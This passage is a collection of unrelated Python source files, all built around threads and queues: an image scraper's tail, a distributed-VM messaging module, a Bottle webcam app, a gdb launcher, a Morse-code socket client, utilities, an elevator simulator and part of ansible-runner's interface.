for i, batch in enumerate(batches)]
for t in threads:
if verbose:
print('starting %s' % t.name)
t.start()
for t in threads:
t.join()
data_write_queue.join()
link_queue.join()
final_t = time.time()
if verbose:
total_t = int((final_t - init_t))
total_files_written = 0
for d, original_count in output_dirs.items():
new_count = len(os.listdir(d))
new_item_count = new_count - original_count
total_files_written += new_item_count
output_dirs[d] = new_item_count
print('done!')
print('----------------------------')
print('Summary:')
print('Total Num. Files Saved: %d' % total_files_written)
print('Total Time : %d' % total_t)
print('Files / Second : %.2ff/s' % (float(total_files_written) / total_t))
print('Files by Category:')
for d, count in output_dirs.items():
print('\t%s: %d' % (os.path.basename(d), count))
# start of main program
if __name__ == '__main__':
import argparse
import json
parser = argparse.ArgumentParser()
parser.add_argument('--search_args_path', type=str, required=True,
help='Search Arguments JSON: \n'
'\t{\'keywords\': {category_label: [search terms]},'
'\t \'addendums\': [additional attributes]}')
parser.add_argument('--out_dir', type=str, required=False,
help='Directory for outputs',
default='output')
parser.add_argument('--log_out_dir', type=str, required=False,
help='Output directory for log files',
default='logs')
parser.add_argument('--verbose', type=bool, required=False,
help='Display verbose info to std.out',
default=False)
parser.add_argument('--num_threads', type=int, required=False,
help='Max number of threads to run',
default=20)
parser.add_argument('--cross_filter', type=str, required=False,
help='Type of cross-category filtering. This helps reduce number of duplicate images copied '
'to different categories. Types=(None, Count, Strict)',
default='Count')
parser.add_argument('--color', type=str, required=False, default='rgb')
parser.add_argument('--type', type=str, required=False, default=None)
args = parser.parse_args()
search_data = json.load(open(args.search_args_path))
keywords = search_data['keywords']
addendums = search_data['addendums']
imcolor = args.color
imtype = args.type
go_go_batch_it(keywords, addendums,
out_dir=args.out_dir,
log_out_dir=args.log_out_dir,
verbose=args.verbose,
num_threads=args.num_threads,
cross_filter=args.cross_filter,
color=imcolor,
type=imtype)
|
communication.py
|
from queue import Queue, Empty
from threading import Thread, Semaphore
from gridvm.network.nethandler import NetHandler
from gridvm.network.protocol.packet import PacketType
from gridvm.network.protocol.packet import Packet
from gridvm.network.protocol.packet import make_packet
class EchoCommunication:
def __init__(self, *args, **kwargs):
self._messages = {}
def receive_message(self, who):
queue = self._messages.setdefault(who, list())
try:
return queue.pop()
except IndexError:
return None
def send_message(self, to, what):
queue = self._messages.setdefault(to, list())
queue.insert(0, what)
def update_thread_location(*args, **kwargs):
pass
def can_receive_message(self, who):
queue = self._messages.setdefault(who, list())
return len(queue) > 0
def shutdown(self):
pass
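# Hedged usage sketch (editor addition): EchoCommunication just buffers
# messages per receiver in memory, so a send followed by a receive for the
# same key round-trips the value.
#
#   comm = EchoCommunication()
#   comm.send_message(to=('prog1', 0), what='ping')
#   assert comm.can_receive_message(('prog1', 0))
#   assert comm.receive_message(('prog1', 0)) == 'ping'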
class NetworkCommunication:
def __init__(self, runtime_id, net_interface):
self.runtime_id = runtime_id
self._messages = { } # Messages that have arrived for threads
self._sent_messages = [ ] # Messages that have been sent over the network
self._fwd_table = { } # Forwarding table <pid, tid> -> <runtime_id>
self._print_req = Queue()
self._status_req = Queue()
self._to_send = Queue() # Packets that should be send over network (runtime_id, packet)
self._migration_req = Queue()
self._sem = Semaphore(value=0)
self._migrate_sucess = False
self.nethandler = NetHandler(self, runtime_id, net_interface)
# Start NetHandler
self.nethandler_thread = Thread(target=self.nethandler.start)
self.nethandler_thread.start()
def receive_message(self, sender, recv):
""" Called from Runtime to receive a message destined for a thread
Parameters:
-- thread_uid: (program_id, thread_id)
"""
# Create queue if not exist
queue = self._messages.setdefault( (recv, sender), Queue())
try:
return queue.get(block=False)
except Empty:
return None
def receive_all_messages(self, thread_uid):
""" Called from Runtime to receive all pending messages destined for a thread
Parameters:
-- thread_uid: (program_id, thread_id)
Returns:
-- List of messages, or an empty list if no messages in buffer
"""
messages = { }
for (recv, sender) in self._messages:
#print( (recv, sender) , self._messages[(recv, sender)].empty() )
if recv == thread_uid:
messages[(recv, sender)] = [ ]
while True:
msg = self.receive_message(sender, recv)
#print(msg)
if msg == None:
break
messages[(recv, sender)].append(msg)
if not messages[(recv, sender)]:
del messages[(recv, sender)]
return messages
def can_receive_message(self, sender, recv):
""" Called from Runtime to check if a message is pending for a thread
Parameters:
-- thread_uid: (program_id, thread_id)
"""
queue = self._messages.setdefault( (recv, sender), Queue())
if not queue.empty():
return True
# Check if a message was sent over the network
if (recv, sender) in self._sent_messages:
#print('Found sent message: {} -> {}'.format(sender, recv))
self._sent_messages.remove( (recv, sender) )
return True
return False
def send_message(self, recv, sender, msg):
""" Called from Runtime to send a message to another thread (same program)
Parameters:
-- thread_uid: (program_id, thread_id)
-- msg: message to send
"""
runtime_id = self._get_runtime_id(recv)
if runtime_id == self.runtime_id:
# Simply add to local message queue
queue = self._messages.setdefault((recv, sender), Queue())
queue.put(msg)
else:
packet = make_packet(
PacketType.THREAD_MESSAGE,
recv=recv,
sender=sender,
msg=msg
)
self._to_send.put( (runtime_id, packet) )
# Add to sent_messages
#print('Add {}:{}'.format(recv, sender))
self._sent_messages.append( (recv, sender) )
def add_thread_message(self, packet):
""" Called from NetHandler to add a new thread message which has arrived """
sender, recv, msg = packet['sender'], packet['recv'], packet['msg']
# Add the message to the queue
queue = self._messages.setdefault( (recv, sender), Queue())
queue.put(msg)
def restore_messages(self, thread_uid, messages):
""" Called from runtime to restore pending messages """
#print(messages)
for (recv, sender) in messages:
queue = self._messages.setdefault( (recv, sender), Queue())
for msg in messages[(recv, sender)]:
queue.put(msg)
def get_print_requests(self):
""" Called from Runtime to get a list of print requests for its own threads
Returns a list of (thread_uid, msg) tuples
"""
return self._get_list( self._print_req )
def send_print_request(self, orig_runtime_id, thread_uid, msg):
""" Called from Runtime to send a print request to responsible runtime
Parameters:
-- orig_runtime_id: runtime_id of the original runtime
-- thread_uid: (program_id, thread_id)
-- msg: message to print
"""
if orig_runtime_id == self.runtime_id:
self._print_req.put( (thread_uid, msg) )
else:
packet = make_packet(
PacketType.RUNTIME_PRINT_REQ,
thread_uid=thread_uid,
msg=msg
)
self._to_send.put( (orig_runtime_id, packet) )
def add_print_request(self, packet):
""" Called from NetHandler to add a print request which has arrived """
thread_uid, msg = packet['thread_uid'], packet['msg']
self._print_req.put( (thread_uid, msg))
def get_status_requests(self):
""" Called from Runtime to get a list of thread status changes of its own threads
Returns a list of (thread_uid, status) tuples
"""
return self._get_list( self._status_req )
def send_status_request(self, orig_runtime_id, thread_uid, new_status, waiting_from=None):
""" Called from Runtime to notify the thread's responsible
runtime, for a thread status change
Parameters:
-- orig_runtime_id: runtime_id of the original runtime
-- thread_uid: (program_id, thread_id)
-- msg: message to print
"""
if orig_runtime_id == self.runtime_id:
self._status_req.put( (thread_uid, (new_status, waiting_from)) )
else:
packet = make_packet(
PacketType.RUNTIME_STATUS_REQ,
thread_uid=thread_uid,
status=new_status,
waiting_from=waiting_from
)
self._to_send.put( (orig_runtime_id, packet) )
def add_status_request(self, packet):
""" Called from NetHandler to add a thread status request which has arrived """
thread_uid, status, waiting_from = packet['thread_uid'], packet['status'], packet['waiting_from']
self._status_req.put( (thread_uid, (status, waiting_from)) )
def get_migrated_threads(self):
""" Called from Runtime to get a list of newly migrated threads """
return self._get_list( self._migration_req )
def migrate_thread(self, thread_uid, thread_package, new_location):
""" Called from Runtime to migrate the thread
Parameters:
-- thread_package: the thread package we want to migrate
-- new_location: runtime_id of the target runtime
"""
if new_location == self.runtime_id:
return
# Send packet
packet = make_packet(
PacketType.MIGRATE_THREAD,
thread_uid=thread_uid,
payload=thread_package
)
self._to_send.put( (new_location, packet) )
# Wait for ACK
self._sem.acquire()
# Update thread location
if self._migrate_sucess:
self.update_thread_location(thread_uid, new_location)
return True
return False
def migrate_thread_completed(self, result):
""" Called from NetHandler to signal runtime that the migration is over """
self._migrate_sucess = result
# Unblock runtime
self._sem.release()
def add_thread_migration(self, packet):
""" Called from NetHandler once a MIGRATE_THREAD packet has arrived """
thread_uid, thread_blob = packet['thread_uid'], packet.payload
self._migration_req.put(thread_blob)
self.update_thread_location(thread_uid, self.runtime_id)
def update_thread_location(self, thread_uid, new_location):
""" Called from NetHandler once a MIGRATION_COMPLETED packet has been received
or from Runtime to update its own threads location
Parameters:
-- thread_uid: (program_id, thread_id)
-- new_location: runtime_id of its new location
"""
self._fwd_table[thread_uid] = new_location
def get_to_send_requests(self):
""" Called from NetHandler """
return self._get_list( self._to_send )
def get_runtimes(self):
return self.nethandler.runtimes
def shutdown(self):
self.nethandler.shutdown()
def _get_list(self, queue):
""" Return a list from a ThreadSafe Queue """
list = [ ]
while True:
try:
list.append( queue.get(block=False) )
except Empty:
break
return list
def _get_runtime_id(self, thread_uid):
""" Return the id of the runtime that currently runs this thread """
if thread_uid not in self._fwd_table:
packet = make_packet(
PacketType.DISCOVER_THREAD_REQ,
thread_uid=thread_uid
)
self._to_send.put( (None, packet) )
# Wait for DISCOVER_THREAD_REP
self._sem.acquire()
return self._fwd_table[thread_uid]
|
main.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 3 00:40:34 2018
@author: hmagg
"""
import threading
import glob
import sqlite3
import bottle
from bottle import route, run, debug, template, static_file, get, request, response, BaseTemplate, redirect
import os
app = bottle.default_app()
BaseTemplate.defaults['get_url'] = app.get_url
from TrainModel import TrainModel
import cv2
from queue import Queue, Empty
button_pressed = Queue()
#global stop_variable
#stop_variable = False
vc = cv2.VideoCapture(0)
"""if __name__ == '__main__':
threading.Thread(target=run, kwargs=dict(host='localhost', port=8080)).start()"""
def gen():
"""Video streaming generator function.
global stop_variable
#stop_variable = ""
while (True):
#print('Inside While')
rval, frame = vc.read()
cv2.imwrite('t.jpg', frame)
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + open('t.jpg', 'rb').read() + b'\r\n')
print(stop_variable)
if stop_variable:
vc.close()
break"""
running = True
while running:
try:
button_pressed.get_nowait()
running = False
vc.release()
except Empty:
#print('Inside While')
rval, frame = vc.read()
cv2.imwrite('t.jpg', frame)
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + open('t.jpg', 'rb').read() + b'\r\n')
@route('/stop', method='POST')
def stop():
#global stop_variable
#stop_variable = request.forms.get('submit')
#stop_variable = True
#print(stop_variable)
button_pressed.put(1)
print(button_pressed)
return "stopped"
@route('/', name='video_feed')
def video_feed():
response.content_type = 'multipart/x-mixed-replace; boundary=frame'
return gen()
#global stop_variable
#stop_variable = False
#if __name__ == '__main__':
@route('/index')
def load_index():
conn = sqlite3.connect('todo.db')
c = conn.cursor()
c.execute("SELECT id, task FROM todo WHERE status LIKE '1'")
result = c.fetchall()
c.close()
insertdata = template('landing_page_insertdata')
output = template('landing_page', template=insertdata)
return output
@route('/<filename:path>', name='static')
def serve_static(filename):
return static_file(filename, root='/home/phoenix/facialrecognition/')
@route('/image')
def upload_image():
directory = glob.glob('dataset/*')
#print(directory)
path = []
for d in directory:
path.append(glob.glob(d+'/*'))
print(path)
#return template("gallery", image_names=images)
#info = {'image_info': path}
insertdata = template('image_page_insertdata', image_info=path)
output = template('landing_page', template=insertdata)
#output = template('landing_page', template=template('complete.tpl'))
return output
@route('/livestream')
def load_image():
insertdata = template('livestream_page_insertdata')
output = template('landing_page', template=insertdata)
return output
@route('/notification')
def load_notification():
insertdata = template('notification_page_insertdata')
output = template('landing_page', template=insertdata)
return output
@route('/upload', method='POST')
def do_upload():
uname = request.forms.get('name')
upload = request.files.get('upload')
name, ext = os.path.splitext(upload.filename)
if ext not in ('.png', '.jpg', '.jpeg'):
return "File extension not allowed."
save_path = "dataset/{uname}".format(uname=uname)
if not os.path.exists(save_path):
os.makedirs(save_path)
file_path = "{path}/{file}".format(path=save_path, file=upload.filename)
upload.save(file_path)
#return "File successfully saved to '{0}'.".format(save_path)
redirect('/image')
#return "File successfully saved to '{0}'.".format(save_path)
@route('/train', method='POST')
def train():
x = TrainModel()
x.generate_pickle_file()
return "stopped"
@get("/static/css/<filepath:re:.*\.css>")
def css(filepath):
return static_file(filepath, root="static/css")
@get("/static/fonts/<filepath:re:.*\.(eot|otf|svg|ttf|woff|woff2?)>")
def font(filepath):
return static_file(filepath, root="static/fonts")
@get("/static/img/<filepath:re:.*\.(jpg|png|gif|ico|svg)>")
def img(filepath):
return static_file(filepath, root="static/img")
@get("/static/js/<filepath:re:.*\.js>")
def js(filepath):
return static_file(filepath, root="static/js")
#debug(True)
#run(reloader=True)
#run()
if __name__ == '__main__':
threading.Thread(target=run, kwargs=dict(host='localhost', port=8080)).start()
threading.Thread(target = gen).start()
|
gdb.py
|
#!/usr/bin/env python
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
import subprocess
import logging
import threading
import signal
import traceback
try:
import Queue
except ImportError:
import queue as Queue
logger = logging.getLogger('gdb')
def _ignoreSignal(signum, frame):
logging.debug('ignoring signal %s, traceback:\n%s' % (
signum, ''.join(traceback.format_list(traceback.extract_stack(frame)))
))
def _launchPyOCDGDBServer(msg_queue):
logger.info('preparing PyOCD gdbserver...')
from pyOCD.gdbserver import GDBServer
from pyOCD.board import MbedBoard
gdb = None
try:
logger.info('finding connected board...')
board_selected = MbedBoard.chooseBoard(blocking=False)
if board_selected is not None:
with board_selected as board:
logger.info('starting PyOCD gdbserver...')
gdb = GDBServer(
board, 3333, {
'break_at_hardfault': True,
'step_into_interrupt': False,
'break_on_reset': False,
}
)
if gdb.isAlive():
msg_queue.put('alive')
while gdb.isAlive():
gdb.join(timeout = 0.5)
# check for a "kill" message from the parent process:
try:
msg = msg_queue.get(False)
if msg == 'kill':
gdb.stop()
break
except Queue.Empty:
pass
else:
logger.error('failed to find a connected board')
except Exception as e:
logger.error('exception in GDB server thread: %s', e)
if gdb != None:
gdb.stop()
raise
msg_queue.put('dead')
def launcher(gdb_exe):
def launch_gdb(projectfiles, executable):
# the "projectfiles" for gdb are really command files that we should
# execute to set up the debug session:
cmd = [gdb_exe]
for f in projectfiles:
cmd += ['-x', f]
cmd.append(executable)
# ignore Ctrl-C while gdb is running:
signal.signal(signal.SIGINT, _ignoreSignal)
child = subprocess.Popen(cmd)
child.wait()
return launch_gdb
def arm_none_eabi_launcher(gdb_exe):
gdb_launcher = launcher(gdb_exe)
def launch_arm_gdb(projectfiles, executable):
queue = Queue.Queue()
t = threading.Thread(target=_launchPyOCDGDBServer, args=(queue,))
try:
t.start()
# wait for an 'alive' message from the server before starting gdb
# itself:
msg = None
while msg != 'alive':
try:
msg = queue.get(timeout=1.0)
except Queue.Empty as e:
msg = None
pass
if msg == 'dead' or not t.is_alive():
raise Exception('gdb server failed to start')
except KeyboardInterrupt as e:
logger.error('stopped by user')
queue.put('kill')
t.join()
raise
gdb_launcher(projectfiles, executable)
queue.put('kill')
t.join()
return launch_arm_gdb
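# Hedged usage sketch (editor addition; file names are hypothetical): build a
# launcher for arm-none-eabi-gdb that also starts the PyOCD gdbserver, then
# invoke it with a list of gdb command files and the ELF to debug.
#
#   launch = arm_none_eabi_launcher('arm-none-eabi-gdb')
#   launch(['debug_init.gdb'], 'build/firmware.elf')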
|
client.py
|
import threading
import time
import socket
import os
from datetime import datetime
from datetime import timedelta
from appJar import gui
import pyaudiomanager
import morsepacket
localNoiseRunning = 0 #flag is set when morse code noise is playing due to local user action
remoteNoiseRunning = 0 #flag is set when morse code noise is playing due to remote user action
port = 60001 #port to listen for signals from
remoteConnection = None #connection received from socket.accept()
destIp = "127.0.0.1" #if address of destination. set to default value
lastMessage = "u" #used to prevent sending many signals when the spacebar is held down
confirmConnection = 0 #flag set if socket.connect() returns with connection
shouldNotQuit = True #flag cleared (set to False) to signal the main loop to exit
app = None #gui of the program
pyAudioManager = None #PyAudioManager instance
events = None #event list to replay at the right time
firstMessageTime = None #datetime when first message from remote was received
delay = 3 #number of seconds to delay the playback of received morse messages
firstSendTime = None #local datetime when the first message was sent to the remote
username = None #username to send messages with
startTime = datetime.now()
###########################################################
# Modify timedelta in packet, add to list and sort list
###########################################################
def addNewEvent(morsePacket):
global events
global firstMessageTime
currentIndex = 0
insertedOutOfPlace = 0
modified = morsePacket
modified.setEventTime(modified.getEventTime() + timedelta(seconds=delay))
modified.setEventTime(modified.getEventTime() + firstMessageTime)
if(events == None or len(events) == 0):
events = [modified]
else:
for event in events:
if(event.getEventTime() >= modified.getEventTime()):
insertedOutOfPlace = 1
events.insert(currentIndex,modified)
break
currentIndex += 1
if(insertedOutOfPlace == 0):
events.append(modified)
###########################################################
# Start a thread running the function eventPlaybackThread()
###########################################################
def startEventPlaybackThread():
t = threading.Thread(target=eventPlaybackThread)
t.start()
###########################################################
# Loop and wait for the correct system time to play back the next event in events list
###########################################################
def eventPlaybackThread():
global shouldNotQuit
global remoteNoiseRunning
global events
nextEventTime = None
while(shouldNotQuit == True):
dt = datetime.now()
if(events != None and len(events) > 0):
nextEventTime = events[0].getEventTime()
if(nextEventTime <= (dt-startTime)):
if(events[0].getEventType() == "u"): #if remote signals that spacebar was released.
killReceivedAudio()
elif (events[0].getEventType() == "d"): #if remote signals that spacebar was pressed down.
if(remoteNoiseRunning == 0): #only start the audio if not already playing
startReceivedAudioThread()
events.pop(0)
time.sleep(0.005)
###########################################################
# Add the morse clicker and exit buttons to the gui and remove label
###########################################################
def addButtonsToGui():
global app
app.removeLabel("label")
clicker = app.addButton("paddle", None)
clicker.bind("<Button-1>", buttonPressed, add="+")
clicker.bind("<ButtonRelease-1>", buttonReleased, add="+")
###########################################################
# Close resources and exit program properly
###########################################################
def quit(suppress):
global shouldNotQuit
global app
shouldNotQuit = False
app.stop()
###########################################################
# Start audio with a lower noise to signify message from remote
###########################################################
def startReceivedAudioThread():
global remoteNoiseRunning
if(remoteNoiseRunning != 0):
return
remoteNoiseRunning = 1
t = threading.Thread(target=startRemoteAudio)
t.start()
###########################################################
# Stop the received-audio playback (the lower tone) to signify the remote message is over
###########################################################
def killReceivedAudio():
global remoteNoiseRunning
remoteNoiseRunning = 0
###########################################################
# Start the audio thread and send a press signal to destination
###########################################################
def buttonPressed(suppress):
global remoteConnection
global lastMessage
global firstSendTime
message = None
if(firstSendTime == None):
firstSendTime = datetime.now()
dt = datetime.now()
if(lastMessage == "u"):
message = ("d," + str(dt - firstSendTime) + "," + str(username)).encode()
try:
remoteConnection.send(message)
except OSError:
print("OSError, server likely disconnected.")
return
lastMessage = "d"
startLocalAudioThread()
###########################################################
# Kill the local audio thread and send a release signal to destination
###########################################################
def buttonReleased(suppress):
global remoteConnection
global lastMessage
message = None
dt = datetime.now()
if(lastMessage == "d"):
message = ("u," + str(dt - firstSendTime) + "," + str(username)).encode()
remoteConnection.send(message)
lastMessage = "u"
killLocalAudio()
###########################################################
# Start a thread to play audio
###########################################################
def startLocalAudioThread():
global localNoiseRunning
if(localNoiseRunning != 0):
return
localNoiseRunning = 1
t = threading.Thread(target=startLocalAudio)
t.start()
###########################################################
# Set flag to stop running the audio thread
###########################################################
def killLocalAudio():
global localNoiseRunning
localNoiseRunning = 0
###########################################################
# Play a beep while the killLocalAudio() function has not been called
###########################################################
def startLocalAudio():
global pyAudioManager
while(localNoiseRunning == 1):
pyAudioManager.getLocalMorseStream().write(pyAudioManager.getLocalSound())
###########################################################
# Play a beep while the killReceivedAudio() function has not been called
###########################################################
def startRemoteAudio():
global pyAudioManager
while(remoteNoiseRunning == 1):
pyAudioManager.getRemoteMorseStream().write(pyAudioManager.getRemoteSound())
###########################################################
# Main method
###########################################################
def main():
global confirmConnection
global destIp
global remoteConnection
global shouldNotQuit
global pyAudioManager
    global firstMessageTime
    global username  # read by buttonPressed()/buttonReleased(), so it must be the module global
remoteMessage = None
morsePacket = None
#Get ip address argument
destIp = os.sys.argv[1]
username = os.sys.argv[2]
#connect to remote machine. Retry indefinitely until user terminates program.
remoteConnection = socket.socket()
remoteConnection.settimeout(1)
while(confirmConnection == 0):
time.sleep(1)
try:
remoteConnection.connect((destIp, port))
confirmConnection = 1
except Exception:
confirmConnection = 0
addButtonsToGui()
startEventPlaybackThread()
pyAudioManager = pyaudiomanager.PyAudioManager()
pyAudioManager.initAudioStuff()
    #program loops forever, waiting for a message from the remote machine to play back the
#noise to the local user.
remoteConnection.send(username.encode())
while(shouldNotQuit == True):
try:
remoteMessage = remoteConnection.recv(1024)
if(remoteMessage.decode() == ""):
shouldNotQuit = False
continue
if(firstMessageTime == None):
firstMessageTime = datetime.now() - startTime
morsePacket = morsepacket.MorsePacket(remoteMessage)
addNewEvent(morsePacket)
except Exception as e:
if(e.__class__.__name__ == "timeout"):
remoteMessage = ""
elif(isinstance(e, OSError)):
print("OSError exception, exiting...")
shouldNotQuit = False
pyAudioManager.close()
remoteConnection.close()
if(len(os.sys.argv) != 3):
print("usage: python client.py <dest> <username>")
os.sys.exit(1)
app = gui(handleArgs=False)
app.addLabel("label", "Waiting to connect to server... click exit button to quit")
exit = app.addButton("exit", quit)
app.thread(main)
app.go()
|
utils.py
|
# -*- coding: utf-8 -*-
"""
Universal utilities
"""
import sys
import time
from functools import wraps
from contextlib import contextmanager
from Queue import Queue
from threading import Thread
def apply_function(f, *args, **kwargs):
""" Apply a function or staticmethod/classmethod to the given arguments.
"""
if callable(f):
return f(*args, **kwargs)
elif len(args) and hasattr(f, '__get__'):
# support staticmethod/classmethod
return f.__get__(None, args[0])(*args, **kwargs)
else:
assert False, "expected a function or staticmethod/classmethod"
def retry(forgivable_exceptions, forgive=lambda x: True,
tries=5, delay=5, backoff=2, logger=None):
"""Retry decorator with exponential backoff.
`forgivable_exceptions` is a type of Exception(or Exception tuple)
`forgive` is a function which takes the caught exception as its argument,
the meaning of its return value is as follows:
a negative object(e.g. `False`, `None`) means the old exception will be
rethrown, an `Exception` object means it will be thrown,
otherwise the failed call is forgiven and will be retried.
Furthermore, if the return value is a function, it will be invoked
before the next try. This function takes the retried call's first
argument(if any) as its argument(which is typically the calling object).
Inspired by:
http://www.saltycrane.com/blog/2009/11/trying-out-retry-decorator-python/
"""
def decorator(f):
if tries < 1:
raise ValueError("tries must be at least 1")
@wraps(f)
def wrapper(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except forgivable_exceptions as e:
forgiven = apply_function(forgive, e) or e
if isinstance(forgiven, BaseException):
if logger:
logger.debug("just give up: {}".format(e))
raise forgiven
msg = "Error: {}. Retry in {} seconds...".format(
str(e), mdelay)
if logger:
logger.debug(msg)
else:
print msg
time.sleep(mdelay)
mtries -= 1
mdelay *= backoff
if callable(forgiven):
forgiven(args[0] if len(args) else None)
return f(*args, **kwargs) # last chance
return wrapper
return decorator
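# Example usage (a sketch; `fetch_page` and `urlopen` stand in for real code):
#
#   @retry(IOError, tries=3, delay=1, backoff=2)
#   def fetch_page(url):
#       return urlopen(url).read()
#
# A call that raises IOError is forgiven and retried after 1s, then 2s,
# for at most 3 attempts in total.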
class JobQueue(object):
"""A threaded job queue
"""
def __init__(self, threads):
self._threads = threads
self._thread_enabled = threads > 1
self._queue = None
def disable_thread(self):
self._thread_enabled = False
def start(self):
if self._threads <= 1:
return
# calling start will automatically enable thread
self._thread_enabled = True
if self._queue: # threads already created
return
queue = self._queue = Queue()
def work():
while True:
func, args, kwargs = queue.get()
try:
func(*args, **kwargs)
finally:
queue.task_done()
for _ in range(self._threads):
t = Thread(target=work)
t.daemon = True
t.start()
def finish(self):
if self._queue:
self._queue.join()
def add_task(self, func, *args, **kwargs):
if self._thread_enabled and self._queue:
self._queue.put((func, args, kwargs))
else:
func(*args, **kwargs)
@contextmanager
def threaded(queue):
"""Wrap the block with the threaded queue
"""
queue.start()
try:
yield
finally:
queue.finish()
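# Example usage (a sketch; `process` and `items` are hypothetical):
#
#   jobs = JobQueue(4)          # up to 4 worker threads
#   with threaded(jobs):
#       for item in items:
#           jobs.add_task(process, item)
#
# threaded() starts the workers on entry and blocks on queue.join() at exit.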
@contextmanager
def uniform_open(filename=None, mode="w"):
if mode == 'w':
default_fp = sys.stdout
elif mode == 'r':
default_fp = sys.stdin
else:
raise ValueError("wrong file mode: {}".format(mode))
if filename:
fp = open(filename, mode)
else:
fp = default_fp
try:
yield fp
finally:
if fp is not default_fp:
fp.close()
def trans_str(string, from_chars, to_chars, encoding='utf8'):
"""Translate a string from one charset to the other
"""
from_unicode = from_chars.decode(encoding)
to_unicode = to_chars.decode(encoding)
trans_tbl = dict(zip(map(ord, from_unicode), map(ord, to_unicode)))
str_unicode = string.decode(encoding)
return str_unicode.translate(trans_tbl).encode(encoding)
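# Example (sketch): trans_str('gray', 'a', 'e') == 'grey'; the typical use is
# mapping between character sets, e.g. full-width characters to ASCII forms.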
|
Controller.py
|
from Elevator import Elevator
import threading
import time
class Controller:
"""control a group of elevators"""
def __init__(self, num_floors, num_elevators):
self.floors = num_floors
self.num_elevators = num_elevators
self.elevators = []
self.pending_targets = {}
self.new_floor_calls = []
self.new_elevator_calls = []
for i in range(num_elevators):
self.elevators.append(Elevator(i, self.floors))
self.pending_targets[i] = []
self.control_loop = threading.Thread(target=self.state_loop, args=(True,))
self.control_loop.start()
self.input_loop()
    def state_loop(self, debug=False):
        """state machine event-based elevator algorithm"""
        while True:
            new_reqs = []
            if len(self.new_floor_calls) > 0:
                for floor in self.new_floor_calls:
                    new_reqs.append(floor)
                # dispatch every collected call, then clear the queue so the
                # same calls are not re-targeted on the next iteration
                for floor in new_reqs:
                    self.elevators[0].target(int(floor))
                self.new_floor_calls = []
            # if len(self.new_elevator_calls) > 0:
            #     for arr in self.new_elevator_calls:
            #         new_reqs.append(arr)
            self.update_routine()
            time.sleep(1)
def input_loop(self):
while True:
data1 = input(
"\nPress 'c' to make a new elevator call.\nPress 'd' to direct an elevator.\nPress 'p' to print out elevators. \n")
if data1 == "c":
data2 = input("Choose a floor (1-" + str(self.floors - 1) + ")")
self.new_floor_calls.append(data2)
elif data1 == "d":
data2 = input("Choose your elevator: 0-" + str(self.num_elevators - 1))
data3 = input("Now choose a floor (0-" + str(self.floors - 1) + ")")
self.new_elevator_calls.append([data2, data3])
elif data1 == "p":
for elevator in self.elevators:
print(elevator)
def update_routine(self):
for elevator in self.elevators:
elevator.update()
if __name__ == "__main__":
controller1 = Controller(10, 1)
|
interface.py
|
# Copyright (c) 2016 Ansible by Red Hat, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import threading
import logging
from ansible_runner import output
from ansible_runner.runner_config import RunnerConfig
from ansible_runner.runner import Runner
from ansible_runner.utils import (
dump_artifacts,
check_isolation_executable_installed,
)
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run() and run_async()
    functions in the same way and return a valid instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run`
'''
dump_artifacts(kwargs)
debug = kwargs.pop('debug', None)
logfile = kwargs.pop('logfile', None)
if not kwargs.pop("ignore_logging", True):
output.configure()
if debug in (True, False):
output.set_debug('enable' if debug is True else 'disable')
if logfile:
output.set_logfile(logfile)
if kwargs.get("process_isolation", False):
check_isolation_executable_installed(kwargs.get("process_isolation_executable", "bwrap"))
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rc = RunnerConfig(**kwargs)
rc.prepare()
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run(**kwargs):
'''
Run an Ansible Runner task in the foreground and return a Runner object when complete.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param playbook: The playbook (either supplied here as a list or string... or as a path relative to
``private_data_dir/project``) that will be invoked by runner when executing Ansible.
:param module: The module that will be invoked in ad-hoc mode by runner when executing Ansible.
:param module_args: The module arguments that will be supplied to ad-hoc mode.
:param host_pattern: The host pattern to match when running in ad-hoc mode.
    :param inventory: Overrides the inventory directory/file (supplied at ``private_data_dir/inventory``) with
a specific host or list of hosts. This can take the form of
- Path to the inventory file in the ``private_data_dir``
- Native python dict supporting the YAML/json inventory structure
- A text INI formatted string
- A list of inventory sources, or an empty list to disable passing inventory
:param roles_path: Directory or list of directories to assign to ANSIBLE_ROLES_PATH
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
read from ``env/extravars`` in ``private_data_dir``.
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
    :param cmdline: Command line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
:param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
:param verbosity: Control how verbose the output of ansible-playbook is
:param quiet: Disable all output
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
